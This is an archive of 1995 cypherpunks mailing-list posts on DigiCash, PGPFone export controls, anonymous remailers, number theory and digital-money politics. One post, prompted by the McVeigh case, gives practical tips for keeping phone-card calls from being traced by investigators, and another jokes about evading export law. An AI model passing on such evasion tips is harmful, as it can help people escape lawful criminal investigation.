From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Mon, 14 Aug 95 13:54:47 PDT
To: perobich@ingr.com
Subject: Re: An article for Wired magazine
In-Reply-To: <199508142009.AA07344@poboy.b17c.ingr.com>
Message-ID: <199508142054.OAA18740@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text



-----BEGIN PGP SIGNED MESSAGE-----

> True. On the other hand, many of these other companies are actually doing
> commerce Right This Minute. As a vendor, my primary interest is availability.


I understand what you mean, although *my* primary interest is 
techno-enthusiasm and near-future sociological speculation.  :-)


> Digicash stands to lose out in the marketplace. Why? Because you can't
> actually buy and sell real goods for real cash right now. One day,
> sure, but not now. By the time they deploy their system, consumers who
> aren't as concerned, or knowledgeable, as cypherpunks will have made
> some other system the market leader.


I'm afraid these words will turn out to be prophetic.  On the other hand, the
nature of this market is such that the industry leadership can turn-over
quickly.  I expect that the factor which has the most inertia in this game is
consumer mind-share.  The other factors-- capital, technology, skilled labor,
publicity-- can all be quickly gained by any aggressive new start-up that
wants them.


> Chilling thought. I hope DC can get a backing bank sometime soon.


According to Steven Levy (in his Wired mag story on David Chaum), Chaum
refuses to make deals with companies that would cut corners on his privacy
provisions.  I don't know how accurate that story is, but if it is true it
would explain why DigiCash is the technological leader and the marketplace 
dark horse.


(Hm.  "DC" -- "DigiCash" -- "David Chaum".  I just noticed that...)


Bryce
signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMC+3wvWZSllhfG25AQGjQgP/dhMWwEEPasttIs/RvkNFA6qRUS9A/7F2
96QvWhA9vetBq97LmwWZxluxw8VgPUoJyltX+eVOHt+JCeDy36rxOhcMe2hH1Z8B
qGZUcwpZ8IUIxkq43SQ0M+MqWyEWRn/0c9vNxu39o7CnOQWIZPfjdSp0CtRdjmu2
E0ypPAFV73c=
=uynK
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dochobbs@wwa.com (Michael D. Hobbs)
Date: Mon, 14 Aug 95 13:03:24 PDT
To: cypherpunks@toad.com
Subject: Re: My pseudo-anonymous dream list
Message-ID: <m0si5j5-000FcVC@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain



Gary wrote,

	I would add a few more suggestions of my own to your wishlist.

	11)  Seamless integration with existing mail programs, such as Eudora.

what about...pine, pegasus, sendmail, airmail, news mail programs... I think 
this
would be up to the individual user or for someone to develop the perfect pgp
mail program.

	12)  Notification that your message has been received (I'm not sure 
how to
	do this and maintain anonymity)

I don't know either if you chain your mail before it gets to the nym server. 
The idea of chaining is to keep the sender anonymous.  Maybe if the nym 
server send mail to your reply block every time your alias and password are
used to send mail.  Though it would have to be something like "your alias has
sent mail to the following xxx@xxx.xxx.

	13)  Ability to handle very large encrypted files (binaries).

Why?  I think this would either

1) cripple the server from the load

2) make it easier to track back to the sender. If you are comparing 1 meg 
files 
   against 1000 byte files it would be much easier to filter out what you are 
not
   looking for.

3) give anon mailers the reputation of porn/warez/church of scientology 
document       distibuters and not privacy mailers which defeats some of the 
things that are 
   trying to get done.

	14)  Perhaps increasing security by breaking messages into several 
parts,
	routing them through
	different chains, and reassembling them just prior to transmission to 
recipient.

Ouch.  I think that would be hard to manage :)  Can you imagine thousands of 
users
sending tens of thousands of messages a day and having more than one remailer 
having
to keep track of hundreds of thousands of 'chunks' of mail.  That would start 
to 
resemble tcp/ip in complexity.



	Keep up the good work!

The concepts are good, I just don't think the implementation would be very 
easy.
You should sign up on the nym server mailing list that was posted here a few
days ago if you are interested in pursuing these ideas.

_____________________________________________________________
dochobbs@wwa.com	M.D. Hobbs	mhobbs@rad.rpslmc.edu
http://miso.wwa.com/~dochobbs		finger for my pgp key
I am human and nothing human do I count alien.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Mon, 14 Aug 95 12:08:35 PDT
To: David Neal <dneal@usis.com>
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <Pine.BSI.3.91.950811164809.28774C-100000@usis.com>
Message-ID: <Pine.SUN.3.91.950814150605.13851A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 11 Aug 1995, David Neal wrote:

> On Fri, 11 Aug 1995, Vladimir Z. Nuri wrote:
> > when someone invents cheap hardware that you can just plug
> > on top of any existing phone, i.e. "the phone adaptor", TPA?,
> > *that's* when the world is going to go crazy with crypto.

> It's closer than you think.  I've been messing with TI's 
> Digital Signal Processing DSK.  For $99 you get a DSP
> with audio in, audio out and 10k of memory.  Reference
> implementations of : DTMF encoders/decoders; 300, 1200, 2400 baud
> modem programs; and voice processing software already exist.

It would be interesting to create a hardware device which is 
interoperable with PGPFone but uses a DSP chip and a slower control 
processor.  I can easilly imagine $100-$150 as a reasonable range.

I will be really curious to see what kind of voice coder they are using 
in PGPFone...I assume it is some flavor of CELP.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Mon, 14 Aug 95 13:19:58 PDT
To: wilcoxb@nagina.cs.colorado.edu (Bryce Wilcox)
Subject: Re: An article for Wired magazine
In-Reply-To: <199508141914.NAA16529@nagina.cs.colorado.edu>
Message-ID: <199508142009.AA07344@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Furthermore none of DigiCash's competitors, as far as I have been able to
> learn, offer any kind of anonymity the way DigiCash does.  The closest they
> come is "confidentiality".  Yeah-- right.  I can get the same offer from the
> Ministry of Truth.

True. On the other hand, many of these other companies are actually doing
commerce Right This Minute. As a vendor, my primary interest is availability.

Digicash stands to lose out in the marketplace. Why? Because you can't
actually buy and sell real goods for real cash right now. One day,
sure, but not now. By the time they deploy their system, consumers who
aren't as concerned, or knowledgeable, as cypherpunks will have made
some other system the market leader.

Chilling thought. I hope DC can get a backing bank sometime soon.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Do you support free speech? Even when
perobich@ingr.com            | you don't like what's being said?
		 Be a cryptography user. Ask me how.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMC+taqfb4pLe9tolAQE0igP/bAT0EidHjONMjmjXmy5AZLCKzj3TM1U0
qPIZR72noaL6YeUQKig9u9DLRe3tSMz9sobSqZuOguapiTP/ZhusoaOVUwxsdgQe
SWtJwgIaMzESZr1lWihUyCopvKiHZmlyCX/3pnpKyubWcCa2lNn9crgzkof1BgVV
vIw6S16waSU=
=00jq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 13 Aug 95 22:11:42 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Why break ITAR? (was: Bet e$ on how long it will take for PGPFone to make it overseas!)
In-Reply-To: <199508140120.VAA24979@bb.hks.net>
Message-ID: <199508140509.PAA22562@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello cypherpunks@toad.com
  and shamrock@netcom.com (Lucky Green)

...
> Still, I have the feeling that
> some irresponsible cyphercriminal will break US law and export PGPFone
> anyway.
...

Fi! You would not suggest that anyone would do that, do you?

There are other ways to get it out, no? For instance, shortly after it
is out, call the police stating that your home was burgled.

Items missing? A few disks of publicly-available freeware.

So what? *The Security of the Nation is at risk!*


Good luck!

Jiri
--
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Mon, 14 Aug 95 13:47:37 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Bet e$ on how long it will take for PGPFone to make it overseas!
In-Reply-To: <199508140120.VAA24979@bb.hks.net>
Message-ID: <Pine.SUN.3.91.950814154154.3940F-100000@bambam.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 13 Aug 1995, Lucky Green wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> To loosen up the often so serious discussions on the list, I propose a
> little game. PGPFone's release is about a week away. PRZ is trying his
> hardest to keep it from being exported. Still, I have the feeling that
> some irresponsible cyphercriminal will break US law and export PGPFone
> anyway. Let us bet cyberbucks on how long it will take for this crime to
> happen. Here is my initial offer:
> 
> I bet e$50 that PGPFone will have been exported 24 hours after its final
> release has been announced to this list. Who is willing to take the bet?
> Perhaps someone is willing to bet at less time?
> 
> Have fun,
> 

This is a sucker bet ... more appropriate would be that you bet it will
take longer than X amount of time. Verification would be tricky too.

-Mike

**************************************************************************
*       Mike Bailey                     (hm)214-252-3915                 * 
*       AT&T Capital Corporation.       (wk)214-456-4510                 *
*       email bailey@computek.net       host bambam.computek.net         *
*   "Remember you can tune a piano but you can't tuna fish -Joe Walsh"   *
*                http://www.computek.net/public/bailey                   *
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 14 Aug 95 13:00:26 PDT
To: John Gilmore <cypherpunks@toad.com
Subject: Re: Are we forming the "social sector"?  FYIntrospection...
Message-ID: <v02120d02ac555af585f8@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>        "the post-capitalist polity needs a 'third sector,' in addition
>        to the two generally recognized ones, the 'private sector' of
>        business and the 'public sector' of government.  It needs an
>        autonomous social sector." (Drucker 1993)

This is a quote from the following:

"The Age of Social Transformation", Peter Drucker, _The Atlantic Monthly_
11/94, pp 53-80.

... which I just read this weekend, coincedentally.  Yes, it's statist.
Still, it's a good read. I learned something from it, even if I found
myself talking back a little. ;-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Champeon - Imonics Development <schampeo@imonics.com>
Date: Mon, 14 Aug 95 13:08:32 PDT
To: gnu@toad.com
Subject: Re: Are we forming the "social sector"?  FYIntrospection...
Message-ID: <9508142008.AA23481@fugazi.imonics.com>
MIME-Version: 1.0
Content-Type: text/plain


|   From owner-cypherpunks@toad.com Mon Aug 14 15:48:43 1995
|   Subject: Are we forming the "social sector"?  FYIntrospection...
|   Sender: owner-cypherpunks@toad.com
|
|   [ ... ]
|   
|           "the post-capitalist polity needs a 'third sector,' in addition
|           to the two generally recognized ones, the 'private sector' of
|           business and the 'public sector' of government.  It needs an
|           autonomous social sector." (Drucker 1993)

Not to start a holy war (no pun intended) but isn't this the role that
according to Locke, et al., was supposed to be filled by Religion? A
moral/social force standing beside government and economics? If Dr.
Johnson had been less immersed in the idea of Truth, I believe he
would have agreed. He wrote for money, hobnobbed with royalty for
status, and was driven by a need to prove himself worthy in the eyes
of his Maker.

I can't stand the perspectives that come out of this "we're so objective
we ignore anything that reeks of irrationality" stance. By restricting
themselves to the projection of history that results, they can't see the
ways in which the things they deny have been the major players in the
situation they claim to understand. "Post-capitalist polity"? What the
hell is this guy smoking? 

I say this not to advance the role of religious fundamentalism, but as
a reminder of the past and an earnest attempt to get people to recognize
that like it or not, religion (however you may conceive it) is already
there. You could argue that people go into government for power and business
for money, and whatever is left over constitutes their religious frame.

Charles Winquist, a professor of the philosophy of religion at Syracuse,
calls religion that which defines what is "real and important" for a
person, a culture, or a nation. I would argue that once you abstract
out the money and power aspects of this, you are left with exactly what
this guy Drucker is trying to say we need. And we already have it.

I like to write good code and do intelligent Web site design. And I
don't do it for Jesus, or Buddha, or Rev. Moon. I do it because it is
what gives my life a sense of reality, and because it is what I have
determined to be important right now. I also pay attention to issues
such as are discussed here (excepting the conspiracy crap) because I
can see that it will be important to me and others.

Just my $.02,
Steve





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Matonis <74774.3663@compuserve.com>
Date: Mon, 14 Aug 95 14:35:53 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: An article for Wired magazine
Message-ID: <950814205254_74774.3663_EHL102-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


This is so that you have the complete context of the post.


---------- Forwarded Message ----------

From:	Jon Matonis, 74774,3663
TO:	Electronic Cash (post), INTERNET:ecm@ai.mit.edu
DATE:	8/14/95 11:10 AM

RE:	Copy of: Re: An article for Wired magazine

Robert Hettinga (rah@shipwright.com)wrote:

>My point is that there isn't e$ denominated in a government's currency,
>more to the point, a popular currency like dollars or marks, or yen.  That
>would make it possible for me to pay a dollar on the net for goods worth a
>dollar. That's what I meant by "real" currency.  What we have are unique
>digital certificates with indeterminate lifetimes which have no nominal
>value except what people are willing to pay for them in the open market.
>This is fine. In fact it's pretty cool that people are willing to impute
>value to them by buying and selling them exclusive of any other economic
>backing.

Since this is for a magazine article, I want to clear up some misconceptions.
The e$ experiment as conducted by DigiCash has broader implications, which the
article may or may not decide to address.

First of all, digital money can take various forms.  Existence on a hard drive
is one of those forms.  But, it is also possible to have digital money on a
card-based platform. Mondex in the UK currently has official government units of
account digitally represented for their Mondex card trial in Swindon.  They have
also announced that in the future this card will hold up to five "official"
currencies.  Furthermore, they make no secret about the fact that this digital
money is ideally suited to transfer on the Net.  Visa and Mastercard are both
working on stored-value cards which will also digitize official currencies.
CyberCash has also announced plans for an electronic token which will most
likely represent an official currency.  Others will announce soon.

Even DigiCash, in its own material, states that they are only the supplier of
technology.  This cyberbuck experiment was to demonstrate that technology --
primarily to banks.  They don't intend to be in this business as the monetary
supplier.  So, the e$ technical experiment served its purpose.  It was unbacked
because that was not what they were promoting.  Banks, as licensees, will
perform the monetary functions and they will undoubtedly issue digital money at
par with governmental units of account.  The trend here is definitely towards
"official" currencies and that will give digital money the trustworthiness and
familiarity which it needs so desparately for acceptance.

But that is not to say that this is the preferred course.  Other trustworthy,
brand-name issuers (non-banks, i.e., Coca-Cola, AT&T, United Airlines, Fidelity
Investments)  with similiar technology (or ones that license it) can certainly
monetize any bearer instruments and then digitize those instruments for the
purpose of a negotiable unit of value.  I argue that this is the preferred
course because it will eliminate the reliance on banks (and central banks) and
speed up considerably the proliferation of digital money for the benefit of all.
Stand-by though:  governments and central banks will do everything in their
power to discourage and prevent this for the power to issue and coin money is
one of THE most cherished privileges of the Crown !

This WiReD article is just the beginning !

Jon W. Matonis





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 14 Aug 95 13:59:32 PDT
To: cypherpunks@toad.com
Subject: Phone Card Risks
Message-ID: <199508142054.QAA23629@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


One of the plethora of TV Magazine shows featured Tim McViegh and phone
cards last week.  Maybe I should post to Risks.

According to the story, Tim McViegh bought a bunch of phone cards from "The
Spotlight" (famous Klan paper) which carried the Spotlight brand name.  He
made lots of calls.  

Later, the Fibbies who checked all the phone records for room and pay phones
at the motels where TM was staying came up with lots of calls to the 800
number of the vendor who was actually switching calls for the Spotlight
phone cards.  The vendor found the card number(s) that matched those calls
and all the other calls that matched those card numbers.  

They made it seem like such a match was a big thing.  Perhaps their
transaction database was not well developed.  In any case, they wrote a
little software and gave the Fibbies a list of all of TM's calls.

There are supposed to be lots of calls to fertilizer dealers, his sister,
and others.  Very interesting.

This is an obvious risk in the use of phone cards that anyone should be able
to figure out for themselves since it is the same risk that pay phones have
always had.  If the Fibbies can find out what telephones you have used, they
can get those records and trace things from there.  This problem has
occurred before for "right wing" nuts and the Mafia.  Several years ago
after members of The Order robbed an armored car in northern California, the
Fibbies found a nearby motel where a bunch of suspicious characters had all
stayed together and traced calls from the pay phone outside to various
wives/girl friends and broke the case from there.  Likewise Mafiosi in their
NYC social clubs have often shown bad phone habits using the nearest pay
phone, etc.  If a pay phone is used enough and well-enough known to the
Fibbies, it even becomes worthwhile to tap it.

So buy lots of phone cards from different dealers (*never* The Spotlight),
use phones unconnected to you, don't make too many calls from the same phone
or using the same card, and be sure to destroy the card preferably before
you use it (the only significant thing about phone cards are the numbers
which can be stored in an encrypted file).  

An easy way to accomplish much of the above is to hang out in big cities
instead of the boonies.  It's a lot easier to find an unlinked phone
(unlinked to you, that is) in the city than in the country.

DCF

"'Well, he hit what he was aiming at.'  Marine DI discussing the fact that
the guy up in the tower at the University of Texas shooting people was an
ex-Marine."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 14 Aug 95 17:54:44 PDT
To: cypherpunks@toad.com
Subject: Name Overloading
Message-ID: <ac553e9e03021004156a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:54 PM 8/14/95, Bryce Wilcox wrote:

>(Hm.  "DC" -- "DigiCash" -- "David Chaum".  I just noticed that...)

Also "Dining Cryptographers," as in "DC-Nets," which DC invented.

Chaum only smirks when asked about this multiple overloading.

--Tim May, aka Marcus Registrada

(overloaded with Trade Mark, Turing Machine, and maybe other things...)

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Mon, 14 Aug 95 17:22:46 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Phone Card Risks
In-Reply-To: <199508142054.QAA23629@panix.com>
Message-ID: <Pine.BSI.3.91.950814191418.25132D-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 14 Aug 1995, Duncan Frissell wrote:
> 
> This is an obvious risk in the use of phone cards....

And up here in Minneapolis, ALMOST ALL of the central city
area pay phones are now rigged so they will not accept change
between 11 PM and 7 AM. Forewarned is forearmed.

Love Always,

Carol Anne

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Mon, 14 Aug 95 17:59:44 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: votelink - some discussions on Phil Z & ITAR
In-Reply-To: <20548.9508141111@exe.dcs.exeter.ac.uk>
Message-ID: <9508150059.AA12545@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


aba@atlas.ex.ac.uk writes
>They were alarmed by the implication that their WWW server now
>contained PGP code which they did not feel qualified to judge the
>implications, or correctness of.  This prompted the posting to the
>forum of a rather worried sounding disclaimer by a votelink
>representative, to the effect that they were abiding by the Prodigy
>ruling, and so felt unable to remove the offending piece of ITAR
>breakage, and yet felt rather unconfortable with it's presence.

Interesting reaction, if I understand it rightly... "We're afraid
that having less than two tenths of a percent of PGP on our system
causes us to violate ITAR, but we're also afraid to remove it because
it may constitute 'moderation' of the discussion and thereby open us
to liability."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Mon, 14 Aug 95 17:11:34 PDT
To: cypherpunks@toad.com
Subject: Request for Cypherpunks to CU-SeeMeize mbone video
Message-ID: <Pine.SUN.3.91.950814200851.14005B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



A while back someone mentioned that they would be videocasting a 
Cypherpunks meeting over the MBONE.

While the MBONE is great for many of us, CU-SeeMe would provide a much 
larger audience.

Check out http://www.umich.edu/~dschluss/nv-cusm.html for information on 
how to forward MBONE video to a CU-SeeMe reflector.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Penny <penny@tyrell.net>
Date: Mon, 14 Aug 95 18:45:09 PDT
To: cypherpunks@toad.com
Subject: e$: Reuters Smells the Coffee + (cyphergroupie confession)
Message-ID: <199508150140.AA05322@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



I might as well confess now and get it over with. Yes I am a cyphergroupie.

I do write code, but it is not cypher-code, however I do get paid for it,
which along with taking care of my family consumes most of my time.

I have a sliver of time that I can devote to reading mailing lists and 
newsgroups from the internet. If you will indulge me, I write this letter
for my own amusement and with the hope that it my spark some interest. 

> Date: Sat, 12 Aug 1995 10:05:35 -0400
> From: rah@shipwright.com (Robert Hettinga)
> Subject: e$: Reuters Smells the Coffee
> 
> 
> --- begin forwarded text
> 
> Mime-Version: 1.0
> Date: Sat, 12 Aug 1995 00:01:58
> From: infocker@megaweb.com
> Sender: infocker@megaweb.com () (from unknown.aol.com 205.188.2.111)
> To: www-buyinfo@allegra.att.com
> Subject: Cyber Economy--Govts. Cannot Control
> 
> Thought Mr. Hettinga might particularly appreciate this perspective.
> 
> Jim Rapp
> Alexandria, Virginia
> "give me more info"
> 
> As always, do not send the copyright police after me.
> 
> 
> LONDON - Growing business on the Internet computer network could
> allow companies and individuals to avoid taxes and build up a black
> economy increasingly out of range of government intervention and
> regulation, computer experts say.
>
[snip]
> 
> "Electronic purses," loaded from banks down telephone lines,
> could become the favored means of payment for fast, anonymous and
> secure payments, with currencies of choice becoming more exotic,
> depending on what is acceptable to dealmakers.

Hmm, Lately I have seen an advertisement on TV from a credit card
company (it might be CitiBank, I don't recall) describing a new style of
credit card (Ringo Star is the spokesman for the card).

Its name is "Private Issue". According to the ad you can pick your
card design (the picture background of the card), and your billing
date.

After seeing this "e$: Reuters Smells the Coffee" post I wonder if
the Bank/Credit-Card company is easing customers into thinking of
private issue cash/credit as a Good-Thing(tm), or it may just be
some sort of marketing gimick to sell more credit card. However,
I do find the choice of name interesting - "Private Issue".

The recent issue of Extropian Magazine (ya, they can be a little kooky,
usually there is something interesting said in the magazine), featured a
disussion of the privitazation of money (with references to Hayek's book
The Denationalization of Money) and its "compatability" with ecash. When
I first heard about the concept of privitizing money I thought it could
not be done. But lately I have been wondering if it is possible to "sell
the idea", especially after seeing the "Private Issue" ad.

If you pitched ecash the right way it is possible that it could catch
on. I think that the most important part of selling the private currency
to small buisnesses would be if the ecash "works" just like credit
cards. If any one out there is thinking of a real 'private issue'. I
think that this is one of the most important design features for the
potential private currency.

What I mean by "works" like credit cards is not the transaction tracking
bookeeping part, but the physical handling of the transaction at the
point of sale. I envision a card reader machine that you run a magnetic
strip card through. The machine read/writes the ecash card does what
ever cryptographic steps necessary to complete the transaction and the
card is handed back to the customer. Credits are transmited to the eash
bank/currency issuer and the clerk hands the customer a recipt. It would
also be good if the card reader machine could also process transactions
with traditional credit cards.

You could even have a logo sticker that you put on your shop window to
show that you will accept that "new kind of credit-card".

Is the bank/credit-card company laying the marketing ground work for a
private currency based on ecash?  If it is, it is a interesting way of
selling the concept, making it a COOL RAD - avant garde thing to use.

Other selling points of a private issue could be lack of inflation, better
intrest rates and possible tax advantages. Of course the issuer would have
to be trusworth (or at least more trusworth than the guverment!).

Signing off, while shopping for Cayman Islands bank services...

[-------------------------------------------------------------------------]
[  Public pgp-key: email penny@tyrell.net with subject as 'send pgp-key'  ]
[     My opinions are mine. I have scored 90% on the the Turing Test.     ]
[                   Alan Penny, penny@tyrell.net                          ]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agent@agents.com
Date: Mon, 14 Aug 95 21:05:25 PDT
To: cypherpunks@toad.com
Subject: You are being monitored
Message-ID: <199508150404.AAA04907@qks.com>
MIME-Version: 1.0
Content-Type: text/plain



If anybody can determine who this came from pleez post a guess.

This is an experiment from inside a program environment. I am serious.



-- Tim May




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 14 Aug 95 21:23:48 PDT
To: cypherpunks@toad.com
Subject: Re: You are being monitored
Message-ID: <ac556f2801021004b2f7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:10 PM 8/14/95, agent@agents.com wrote:
>If anybody can determine who this came from pleez post a guess.
>
>This is an experiment from inside a program environment. I am serious.
>
>
>
>-- Tim May

Well, never mind, I guess. I don't think I added this, but I guess I did.
So much for my experiment.

My new SmalltalkAgents environment has a method for mailing from within a
program environment, if a TCP/IP connection is open. This allows Smalltalk
programs to directly send mail. On a Macintosh, this is not so trivial.

The manufacturer is apparently acting as the collection point, and any name
can be put into the From: field.

--Tim

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 14 Aug 95 18:59:41 PDT
To: cypherpunks@toad.com
Subject: Re: An article for Wired magazine
In-Reply-To: <199508142009.AA07344@poboy.b17c.ingr.com>
Message-ID: <9508150158.AA12834@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



I'm less worried about the annonymity aspect than the security aspect. The 
reported Mondex approach is less than impressive. 

The major problem with DigiCash is the patent portfollio. I don't much like the 
idea of David Chaum replacing the government as the controller of the money 
supply. Sorry, I just don't.

The problem with Chaum's work is that it is unbalanced. He considers only the 
privacy aspect. The prevention of extortion aspect he does not consider. 
DigiCash have never addressed the baby-napping protocol problem as far as I am 
aware.

Governments have certain rights in our society that individuals do not. This is 
justified by their being democratically accountable. I don't think we should 
readily agree to surrender those rights. Do you want the world of the future to 
be controlled by Bill Gates, Ted Turner and David Chaum?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: klbarrus@infocom.net (Karl L. Barrus)
Date: Mon, 14 Aug 95 20:25:50 PDT
To: cypherpunks@toad.com
Subject: Re: Q's on Number Theory/Quadriatic Residues
Message-ID: <199508150325.WAA08157@infocom.net>
MIME-Version: 1.0
Content-Type: text/plain


>How are these square roots?  9 is certainly not the square root of 11, nor is
>8 the square root of 29, even modulo 35.  

What this means is that 9^2 mod 35 = 11, and 8^2 mod 35 = 29.  See the list
right above the chart that is confusing you.

For example, it lists x^2 = 29 mod 35 has a solution: x = 8,13,22,27

So actually there are 3 other solutions... 13, 22, and 27 are also square
roots of 29 mod 35.

>[ 1/v vs. v-1]
>Are these two expressions interchangeable

Yes.

>3)Speaking of errata, where can I find a copy?

Hm... I forgot.  I have one somewhere and will send it along if I find it.

>Is it possible to predict the possible quadriatic residues, or is an

Yes, you can use the Jacobi symbol to determine if a is a quadratic residue
mod n.  See page 207.

>5)From what does Feige-Fiat-Shamir derive its security?

Difficulty of factoring.
--
Karl L. Barrus <klbarrus@infocom.net>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Mon, 14 Aug 95 19:44:23 PDT
To: hallam@w3.org
Subject: Re: An article for Wired magazine
In-Reply-To: <9508150158.AA12834@zorch.w3.org>
Message-ID: <199508150244.WAA19899@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> The problem with Chaum's work is that it is unbalanced. He considers
> only the privacy aspect. The prevention of extortion aspect he does
> not consider.  DigiCash have never addressed the baby-napping
> protocol problem as far as I am aware.

DigiCash as defined makes it trivial to trace cash you give to someone
provided there is collusion between the payer and the bank. Doesn't
that solve the baby-napping problem?

Incidently, so far as I know, there is no physical world way to solve
the babynapping problem. Hell, you can just demand a case with five
kilos of gold in it if $50,000 in cash doesn't suit your tastes. I
defy governments to eliminate gold as well as paper currency.

> Governments have certain rights in our society that individuals do
> not. This is justified by their being democratically accountable.

Lets not get into a polititical discussion, but many of us here would
deny the legitimacy of authoritarianism simply on the basis that a
majority of the tiny minority that votes decided to vote for it.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Mon, 14 Aug 95 21:21:23 PDT
To: agent@agents.com
Subject: Re: You are being monitored
In-Reply-To: <199508150404.AAA04907@qks.com>
Message-ID: <Pine.BSI.3.91.950814232006.11402A-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Whois yielded this:

[usr5.primenet.com] (carolab): whois agents.com
Software Agents (AGENTS-DOM)
   12236 Brittania Cir
   Germantown, MD 20874
 
   Domain Name: AGENTS.COM
 
   Administrative Contact:
      Houston, Bob  (BH55)  rkh@ACCESS.DIGEX.NET
      (301) 601-4362
   Technical Contact, Zone Contact:
      Kern, Edward  (EK6)  ejk@DIGEX.NET
      800-969-9090 301-847-5000 (FAX) 301-847-5215
 
   Record last updated on 10-Jan-94.




On Mon, 14 Aug 1995 agent@agents.com wrote:

> 
> If anybody can determine who this came from pleez post a guess.
